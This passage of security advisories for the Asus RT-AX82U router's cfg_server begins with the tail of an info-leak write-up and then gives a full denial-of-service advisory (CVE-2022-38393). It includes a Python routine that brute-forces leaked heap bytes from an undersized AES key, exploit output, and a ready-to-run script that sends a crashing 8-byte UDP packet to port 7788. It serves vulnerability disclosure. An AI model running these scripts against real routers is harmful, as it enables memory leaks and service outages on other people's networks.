Trimming out all the error cases, we start from where the server begins reading the bytes decrypted with its RSA private key. All the fields have their endianness reversed, and the sub-request type is checked at [8]. A size check at [9] prevents us from doing anything silly with the length field in our master_key message, and a CRC check occurs at [10]. Finally, the sess_block->master_key allocation occurs at [11] with a size that is provided by our packet.

Now, an important fact about AES encryption is that the key is always a fixed size, and for AES-256, our key needs to be 0x20 bytes. As noted above, however, there’s not actually any explicit length check to make sure the provided master_key is 0x20 bytes. Thus, if we provide a master_key that’s, say, 0x4 bytes, a malloc, memset, and memcpy of size 0x4 will occur. aes_encrypt will read 0x20 bytes from the start of our master_key’s heap allocation, resulting in an out-of-bounds read and assorted heap data being included in the AES key that encrypts the response. While not exactly a straightforward leak, we can figure out these bytes if we slowly oracle them out. Since we know what the last bytes of the response should be (the client_nonce that we provide), we can simply give a master_key that’s 0x1F bytes, and then brute force the last byte locally, trying to decrypt the response with each of the 0x100 possibilities until we get one that correctly decrypts. Since we know the last byte, we can then move on to the second-to-last byte, and so on and so forth, until we get useful data.
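Once a response encrypted with the truncated key comes back, recovering the appended heap byte is a purely local brute force over candidate AES-256-ECB keys. A rough sketch, assuming pycryptodome, a 0x1F-byte master_key we chose, and the encrypted blob already extracted from the server’s REQ_NC response:

from Crypto.Cipher import AES  # pycryptodome; an assumption for this sketch

def recover_leaked_byte(master_key_31: bytes, client_nonce: bytes, encrypted_payload: bytes):
    """Brute force the heap byte that pads our 0x1F-byte master_key to a full AES-256 key.

    master_key_31:     the 0x1F key bytes we placed in the REQ_NC packet
    client_nonce:      the nonce we sent, which the server echoes back in its reply
    encrypted_payload: the AES-256-ECB blob extracted from the server's response
    """
    assert len(master_key_31) == 0x1F
    # ECB works on whole 16-byte blocks, so trim any trailing partial block.
    encrypted_payload = encrypted_payload[: len(encrypted_payload) // 16 * 16]
    for guess in range(0x100):
        key = master_key_31 + bytes([guess])          # candidate 0x20-byte key
        plaintext = AES.new(key, AES.MODE_ECB).decrypt(encrypted_payload)
        # A correct guess should make the client_nonce we supplied reappear in
        # the decrypted data; a wrong key yields pseudo-random garbage.
        if client_nonce in plaintext:
            return guess                              # the leaked heap byte
    return None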

While the malloc that occurs can go into a different bucket based on the size of our provided master_key, heuristically it seems that the same heap chunk is returned with a master_key of less than 0x1E bytes. A different chunk is returned if the key is 0x1F or 0x1E bytes long. If we thus give a key of 0x1D bytes, we have to brute-force 3 bytes at once, which takes a little longer but is still doable. After that we can go byte-by-byte again and leak important information such as thread stack addresses.

Crash Information

$python infoleak.py

Type: 1 (cm_processREQ_KU)
Len:  0x4
CRC:  0x56b642cd
===MSG===
\x11\x22\x33\x44
=========

b'\x00\x00\x00\x01\x00\x00\x00\x04V\xb6B\xcd\x11"3D'
[^_^] Importing:
-----BEGIN PUBLIC KEY-----
[...]
-----END PUBLIC KEY-----

Type: 3 (cm_processREQ_NC)
Len:  0x100
CRC:  0x92657321
===MSG===
\x1a\x54\xd7\x4a\xf6\x7a\xe1\x4c\x16\x76\x69\x74\x2b\x96\x41\xc6\xa0\xbc\x57\x58\x45\x61\xa9\xa9\x04\x09\xae\xb4\xb2\x9c\x54\xdd\xb8\xd1\x8f\x0d\x25\xf6\x79\x07\xd6\x65\x12\x75\xbb\x7d\x2d\x4e\x41\xf0\xa9\x47\x75\xa5\x73\x2d\x4c\x02\x10\x9e\xb1\x3a\x2c\xa5\x1c\x11\xfe\x35\x8e\xd3\x95\x53\xe5\x90\x3a\x9a\x8b\xad\x9b\x10\x81\xde\xd3\x67\x19\x9d\x34\x44\x52\x75\x1d\x90\xc7\xbf\x19\xf1\x04\x15\x19\xd4\x11\x2d\x70\xbd\xa9\x87\xdf\x22\x59\xc2\xb0\xb1\xd5\x7b\x5a\xcb\xe7\xc7\x34\x0f\xcb\xa6\x9f\x81\x5c\xb3\x6d\xf7\x1c\x49\xd7\xed\x72\x54\x85\xe0\xca\x32\x96\xa9\xa2\x44\xda\x56\xfb\xf7\x96\x21\x53\xb7\xbe\x9c\xc9\x5f\x4a\x00\xdb\x2f\xd2\x6e\x1b\xf5\xdc\xa9\xa5\x8f\xde\xf5\x80\x83\xd7\xd8\x65\xe8\x6f\xd6\x0a\x3e\x10\x92\xca\xd2\xbf\x14\x1c\x06\xf0\x53\xb5\x41\xea\x2a\xe2\x5c\x2a\xa8\xb9\xa2\x92\xe7\xd5\x44\x55\x1c\x8e\x9b\xff\x13\x37\x60\x5b\x82\xfa\xa0\xe7\x44\x8f\x0b\xe9\x8f\x64\xcd\xa4\x50\xe9\xcd\xbc\x14\x34\xed\x57\xc5\x0a\xaf\xc3\x8d\x71\xee\x48\x35\x90\xa6\xb7\x08\x6c\xfb\xb1\xbf\xee\x0c\x72\x21\xdf\x4e\x29\xf9
=========

[^_^] Leaked Bytes: 0x0000b620
b'\x00\x00\x00\x02\x00\x00\x00 \x1a=\xac\x11\xebVxU\xe7\\\xdb8\x02\\k\n<\x91_>\x17\xc6r\x08\xfc\xbc\xde\xf6\x1a\x1ev\xfa\x03_\xf0y\x00\x00\x00\x03\x00\x00\x00\x07\x10\xc1\x06\xa9\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x01'

Asus RT-AX82U cfg_server cm_processConnDiagPktList denial of service vulnerability

CVE-2022-38393

SUMMARY

A denial of service vulnerability exists in the cfg_server cm_processConnDiagPktList opcode of Asus RT-AX82U 3.0.0.4.386_49674-ge182230 router’s configuration service. A specially-crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Asus RT-AX82U 3.0.0.4.386_49674-ge182230

PRODUCT URLS

RT-AX82U — https://www.asus.com/us/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AX82U/

DETAILS

The Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like basically every other router, it is configurable via an HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in a more IoT style.

The cfg_server and cfg_client binaries living on the Asus RT-AX82U are both used for easy configuration of a mesh network setup, which can be done with multiple Asus routers via their GUI. Interestingly though, the cfg_server binary is bound to TCP and UDP port 7788 by default, exposing some basic functionality. The TCP and UDP ports have different opcodes, but for our sake, we’re only dealing with a particular set of ConnDiag opcodes, which look like such:

struct tlv_holder connDiagPacketHandlers = 
{
    uint32_t type = 0x5
    tlv_func *tfunc = cm_processREQ_CHKSTA
}
struct tlv_holder connDiagPacketHandlers[1] = 
{
    uint32_t type = 0x6
    tlv_func *tfunc = cm_processRSP_CHKSTA
}

The above TLVs are accessible from the cm_recvUDPHandler thread in a particular code flow:

0001ed90      cm_recvUdpHandler()
              // [...]
0001edf8      int32_t bytes_read = recvfrom(sfd: cm_ctrlBlock.udp_sock, buf: &readbuf, len: 0x7ff, flags: 0, srcaddr: &sockadd, addrlen: &sockaddsize) // [1]
                // [...]
0001ee00      if (bytes_read == 0xffffffff)
                // [...]
0001ee98      else if (sockadd.sa_data[2].d != cm_ctrlBlock.self_address)
                // [...]
0001f0e0          char* malloc_824 = malloc(bytes: 0x824) // [2]
0001f0e4          struct udp_resp* inp = malloc_824
0001f0e8          if (malloc_824 != 0)
0001f184              memset(malloc_824, 0, 0x824)        // [3]
0001f194              memcpy(inp, &readbuf, bytes_read)
0001f198              int32_t ipaddr = sockadd.sa_data[2].d
0001f19c              inp->bytes_read = bytes_read
0001f1a4              int32_t ip = ipaddr u>> 0x18 | (ipaddr u>> 0x10 & 0xff) << 8 | (ipaddr u>> 8 & 0xff) << 0x10 | (ipaddr & 0xff) << 0x18
0001f1d4              snprintf(s: &inp->ip_addr_str, maxlen: 0x20, format: "%d.%d.%d.%d", ip u>> 0x18, ip u>> 0x10 & 0xff, ip u>> 8 & 0xff, ror.d(ip, 0) & 0xff, var_864, var_860, var_85c, var_858, var_854)
0001f1dc              int32_t var_838_1 = readbuf[4].d
0001f1dc              int32_t var_834_1 = readbuf[8].d
0001f1e8              if (readbuf[0].d == 0x6000000)      // [4]
0001f1f0                  r0_6 = cm_addConnDiagPktToList(inp: inp)

At [1], the server reads in up to 0x7ff bytes from its UDP 7788 port, and at [2] and [3], the data is then copied from the stack over to a cleared-out heap allocation of size 0x824. Assuming the first four bytes of the input packet are “\x00\x00\x00\x06”, the packet gets added to a particular linked-list structure, the connDiagUdpList. Before we continue on though, it’s appropriate to list out the structure of the input packet:

struct tlv_pkt {
    uint32_t type;
    uint32_t datalen;
    uint32_t crc;
    uint8_t data[];
}

Continuing on, another thread is constantly polling the connDiagUdpList, and if a packet is seen, then we jump over to cm_processConnDiagPktList():

00053ca8  int32_t cm_processConnDiagPktList()    
00053cc8      pthread_mutex_lock(mutex: &connDiagLock)
00053cd8      struct list* connDiagUdp = connDiagUdpList
00053ce8      if (connDiagUdp->entry_count s> 0)
00053d2c          for (struct listitem* item = connDiagUdp->tail; item != 0; item = item->next)
00053d30              struct udp_resp* input_pkt = item->inp
00053d38              if (input_pkt != 0)
00053d44                  uint32_t null = terminateConnDiagPktList
00053d4c                  if (null != 0)
00053d4c                      break
00053d50                  uint32_t hex_6000000 = input_pkt->req_type_le
00053d58                  uint32_t dlen = input_pkt->datalen_le
00053d68                  int32_t dlenle = input_pkt->bytes_read - 0xc  // [5]
00053d6c                  uint32_t crcle = input_pkt->crcle
                            // [...]
00053d80                  if (dlenle == (dlen u>> 0x18 | (dlen u>> 0x10 & 0xff) << 8 | (dlen u>> 8 & 0xff) << 0x10 | (dlen & 0xff) << 0x18)) //[6]
00053e0c                      char* buf = &input_pkt->readbuf
00053e18                      crc = do_crc32(IV: null, buf: buf, bufsize: dlenle) // [7]

At [5], the actual length of the input packet minus twelve is compared against the length field inside the packet itself [6]. Assuming they match, the CRC is then checked, another field provided in the packet itself. A flaw is present in this function, however, in that a check which can be seen in both the TCP and UDP handlers is missing from this code path: the code needs to verify that the size of the received packet is >= 0xC bytes. Thus, if a packet is received that is less than 0xC bytes, the dlenle field at [5] underflows to somewhere between 0xFFFFFFFC and 0xFFFFFFFF. The check against the length field [6] can be easily bypassed by just correctly putting the underflowed length inside the packet. The CRC check at [7] isn’t an issue, since if the bufsize parameter is less than zero, it automatically skips CRC calculation. Since a CRC skip results in a return value of 0x0, we need to make sure that the crc field is “\x00\x00\x00\x00”. Conveniently, this is handled already for us if our packet is only 8 bytes long, since the buffer that the packet lives in was memset to 0x0 beforehand.

While we can pass all the above checks with an 8-byte packet, it does prevent us from having any control over what occurs after. We end up hitting cm_processConnDiagPkt(uint32_t tlv_type, uint32_t datalen, uint32_t crc, char *databuf, char *ipaddr), which just passes us off to the appropriate TLV handler. Since our opcode has to be “\x00\x00\x00\x06”, we always hit cm_processRSP_CHKSTA(char *pktbuf, uint32_t pktlen, uint32_t ipaddr):

00052f20  int32_t cm_processRSP_CHKSTA(char* pktbuf, uint32_t pktlen, int32_t ipaddr)
00052f50      char jsonbuf[0x800]
00052f50      memset(&jsonbuf, 0, 0x800)
                             // [...]
00052f64      if (cm_ctrlBlock.group_key_ready != 0)
00053004          char* groupkey = cm_selectGroupKey(which_key: 1)
0005300c          if (groupkey == 0)
                                              // [...]
00053098              goto label_530a0
000530c0          char* r0_11 = do_decrypt(sesskey1: groupkey, sesskey2: cm_selectGroupKey(which_key: 0), pktbuf: pktbuf, pktlen: pktlen) //[8]

Assuming there is a group key (which there should always be, even if the AiMesh setting is not configured), we end up hitting the do_decrypt function at [8], which decrypts the data of our input packet with one of the group keys. The do_decrypt function ends up hitting aes_decrypt, as shown below:

0001db18  void* aes_decrypt(char* sesskey1, char* pktbuf, char* pktlen, int32_t* outlen)
0001db30      int32_t ctx = EVP_CIPHER_CTX_new()
0001db38      int32_t outl = 0
0001db3c      void* ctx = ctx
0001db40      void* ret
0001db40      if (ctx == 0)
                                    // [...]
0001db6c      else
0001db6c          char* bytesleft = nullptr
0001db7c          int32_t r0_2 = EVP_DecryptInit_ex(ctx, EVP_aes_256_ecb(), 0, sesskey1, 0)
                                     // [...]
0001db84          if (r0_2 != 0)
0001dba0              *outlen = 0
0001dbac              void* alloc_size = EVP_CIPHER_CTX_block_size(ctx) + pktlen
0001dbb4              maloced = malloc(bytes: alloc_size)  // 0xc...
0001dbbc              if (maloced == 0)
                                                     //[...]
0001dbe4              else
0001dbe4                  memset(maloced, 0, alloc_size)
0001dbec                  void* mbuf = maloced
0001dbf0                  char* pktiter = pktlen
0001dc00                  void* inpbuf
0001dc00                  void* r3_2
0001dc00                  while (true)
0001dc00                      inpbuf = &pktbuf[pktlen - pktiter]
0001dc04                      if (pktiter u<= 0x10)
0001dc04                          break
0001dc10                      bytesleft = 0x10
0001dc1c                      int32_t r0_8 = EVP_DecryptUpdate(ctx, mbuf, &outl, inpbuf, 0x10) //[9]
0001dc20                      r3_2 = r0_8
0001dc24                      if (r0_8 == 0)
0001dc24                          break
0001dc60                      int32_t outl_len = outl
0001dc64                      pktiter = pktiter - 0x10
0001dc6c                      mbuf = mbuf + outl_len
0001dc74                      *outlen = *outlen + outl_len

For brevity’s sake, we can skip all the way to [9], where EVP_DecryptUpdate is called repeatedly in a loop over the input buffer. Since the pktlen argument has been underflowed to at least 0xFFFFFFFC, it suffices to say that we have a wild read, resulting in a crash when reading unmapped memory.
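Putting the pieces together, triggering the crash comes down to a single 8-byte UDP datagram whose length field already encodes the underflowed value. A minimal sketch (the router address is a placeholder; the opcode, port, and field layout come from the analysis above):

import socket
import struct

ROUTER_IP = "192.168.50.1"  # placeholder address
CFG_PORT = 7788

# Opcode 0x6 (dispatched to cm_processRSP_CHKSTA) plus a length field of 0xFFFFFFFC.
# The packet is only 8 bytes, so bytes_read - 0xc underflows to 0xFFFFFFFC and
# matches the length field, while the crc field is read from the zeroed-out
# 0x824-byte heap buffer, so the skipped CRC check passes as well.
packet = struct.pack(">II", 0x6, 0xFFFFFFFC)

with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
    s.sendto(packet, (ROUTER_IP, CFG_PORT))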

Crash Information

potentially unexpected fatal signal 11.
CPU: 1 PID: 12452 Comm: cfg_server Tainted: P           O    4.1.52 #2
Hardware name: Generic DT based system
task: d04cd800 ti: d0632000 task.ti: d0632000
PC is at 0xb6c7f460
LR is at 0xb6d3ca04
pc : [<b6c7f460>]    lr : [<b6d3ca04>]    psr: 60070010
sp : b677c46c  ip : 00ff4ff4  fp : b6600670
r10: b6c7ef40  r9 : 00000000  r8 : beec0b82
r7 : b6600670  r6 : 00000010  r5 : b6620c38  r4 : 00ff5004
r3 : b6c7f440  r2 : 00000000  r1 : 00000000  r0 : 00000000
Flags: nZCv  IRQs on  FIQs on  Mode USER_32  ISA ARM  Segment user
Control: 10c5387d  Table: 1048c04a  DAC: 00000015
CPU: 1 PID: 12452 Comm: cfg_server Tainted: P           O    4.1.52 #2
Hardware name: Generic DT based system
[<c0026fe0>] (unwind_backtrace) from [<c0022c38>] (show_stack+0x10/0x14)
[<c0022c38>] (show_stack) from [<c047f89c>] (dump_stack+0x8c/0xa0)
[<c047f89c>] (dump_stack) from [<c003ac30>] (get_signal+0x490/0x558)
[<c003ac30>] (get_signal) from [<c00221d0>] (do_signal+0xc8/0x3ac)
[<c00221d0>] (do_signal) from [<c0022658>] (do_work_pending+0x94/0xa4)
[<c0022658>] (do_work_pending) from [<c001f4cc>] (work_pending+0xc/0x20)